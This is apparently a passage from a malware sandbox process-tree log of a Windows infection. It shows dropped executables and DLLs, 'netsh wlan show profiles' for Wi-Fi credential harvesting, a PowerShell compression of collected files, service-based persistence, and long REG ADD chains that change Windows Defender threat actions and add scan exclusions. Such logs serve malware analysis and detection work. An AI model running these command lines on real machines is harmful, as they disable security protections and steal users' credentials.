C:\Users\Admin\Pictures\ieO8FSRSczqUjuUJaGECaR0H.exe"C:\Users\Admin\Pictures\ieO8FSRSczqUjuUJaGECaR0H.exe"4⤵PID:1424
-
C:\Users\Admin\Pictures\FeGYR7BKo8JKgPesnICIZTGC.exe"C:\Users\Admin\Pictures\FeGYR7BKo8JKgPesnICIZTGC.exe"4⤵PID:8248
-
C:\Users\Admin\Pictures\pxRutue7aexh3csVTah40Cj9.exe"C:\Users\Admin\Pictures\pxRutue7aexh3csVTah40Cj9.exe"4⤵PID:7116
-
C:\Users\Admin\Pictures\XhTQ4YOrqkroDxrljynEeezE.exe"C:\Users\Admin\Pictures\XhTQ4YOrqkroDxrljynEeezE.exe" --silent --allusers=04⤵PID:2432
-
C:\Users\Admin\Pictures\XhTQ4YOrqkroDxrljynEeezE.exeC:\Users\Admin\Pictures\XhTQ4YOrqkroDxrljynEeezE.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x2a0,0x2a4,0x2a8,0x124,0x2ac,0x6af4e1d0,0x6af4e1dc,0x6af4e1e85⤵PID:5828
-
C:\Users\Admin\Pictures\JXDPQlSae8AtwR9C6JgN8qAW.exe"C:\Users\Admin\Pictures\JXDPQlSae8AtwR9C6JgN8qAW.exe"4⤵PID:6652
-
C:\Users\Admin\Pictures\Az98DXLtElsrLW4tdZt6ZMZw.exe"C:\Users\Admin\Pictures\Az98DXLtElsrLW4tdZt6ZMZw.exe"4⤵PID:1524
-
C:\Users\Admin\Pictures\5mFtnEORMGbfZvzAapXk8Mw2.exe"C:\Users\Admin\Pictures\5mFtnEORMGbfZvzAapXk8Mw2.exe"4⤵PID:8224
-
C:\Users\Admin\Pictures\oucn2UoBZwni01o0Tk1C9jLo.exe"C:\Users\Admin\Pictures\oucn2UoBZwni01o0Tk1C9jLo.exe"4⤵PID:7412
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
PID:7648 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:7672 -
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:7764
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\106386276412_Desktop.zip' -CompressionLevel Optimal4⤵PID:7388
-
C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:8084 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installg.bat" "3⤵PID:7184
-
C:\Windows\SysWOW64\sc.exeSc delete GameServerClient4⤵
- Launches sc.exe
PID:7540 -
C:\Program Files (x86)\GameServerClient\GameService.exeGameService remove GameServerClient confirm4⤵
- Executes dropped EXE
PID:7628 -
C:\Program Files (x86)\GameServerClient\GameService.exeGameService install GameServerClient "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"4⤵
- Executes dropped EXE
PID:7988 -
C:\Program Files (x86)\GameServerClient\GameService.exeGameService start GameServerClient4⤵
- Executes dropped EXE
PID:7280 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installc.bat" "3⤵PID:6880
-
C:\Windows\SysWOW64\sc.exeSc delete GameServerClientC4⤵
- Launches sc.exe
PID:7428 -
C:\Program Files (x86)\GameServerClient\GameService.exeGameService remove GameServerClientC confirm4⤵PID:5580
-
C:\Program Files (x86)\GameServerClient\GameService.exeGameService install GameServerClientC "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"4⤵PID:9188
-
C:\Program Files (x86)\GameServerClient\GameService.exeGameService start GameServerClientC4⤵PID:6380
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "3⤵PID:9008
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5340
-
C:\Program Files (x86)\GameServerClient\GameService.exe"C:\Program Files (x86)\GameServerClient\GameService.exe"1⤵
- Executes dropped EXE
PID:7348 -
C:\Program Files (x86)\GameServerClient\GameServerClient.exe"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"2⤵
- Executes dropped EXE
PID:8020 -
C:\Program Files (x86)\GameServerClient\GameServerClient.exe"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"2⤵PID:8896
-
C:\Program Files (x86)\GameServerClient\GameServerClient.exe"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"2⤵PID:8656
-
C:\Program Files (x86)\GameServerClient\GameServerClient.exe"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"2⤵PID:6564
-
C:\Program Files (x86)\GameServerClient\GameServerClient.exe"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"2⤵PID:9048
-
C:\Program Files (x86)\GameServerClient\GameServerClient.exe"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"2⤵PID:7836
-
C:\Program Files (x86)\GameServerClient\GameServerClient.exe"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"2⤵PID:6396
-
C:\Program Files (x86)\GameServerClient\GameServerClient.exe"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"2⤵PID:6220
-
C:\Program Files (x86)\GameServerClient\GameServerClient.exe"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"2⤵PID:5008
-
C:\Program Files (x86)\GameServerClient\GameServerClient.exe"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"2⤵PID:5224
-
C:\Program Files (x86)\GameServerClient\GameServerClient.exe"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"2⤵PID:5636
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8300
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:8396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:8404
-
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\bYrKICR.exeC:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\bYrKICR.exe em /musite_idwaB 385118 /S1⤵
- Drops file in System32 directory
PID:2440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6460 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1260
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:7788
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:7504
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1164
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:6488
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1548
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:6620
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:8116
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:8128
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:6396
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1880
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:6292
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1372
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:8888
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:7728
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:8608
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:9028
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:8952
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:8932
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:9120
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5196
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:7940
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:9204
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5640
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5616
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4220
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1484
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:7400
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4816
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJLDvKxDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJLDvKxDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jDcnSjPvYahU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jDcnSjPvYahU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qpZxqHvFKXpRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qpZxqHvFKXpRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vGrfpbVBjyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vGrfpbVBjyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mMAjWdbxOIjSziVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mMAjWdbxOIjSziVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\heXdjphsLYtTYYrU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\heXdjphsLYtTYYrU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
PID:6076 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:323⤵PID:8268
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:324⤵PID:8684
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:643⤵PID:6624
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:323⤵PID:7552
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:643⤵PID:7376
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:323⤵PID:7876
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:643⤵PID:7648
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:323⤵PID:4756
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:643⤵PID:4400
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:323⤵PID:7952
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:643⤵PID:8556
-
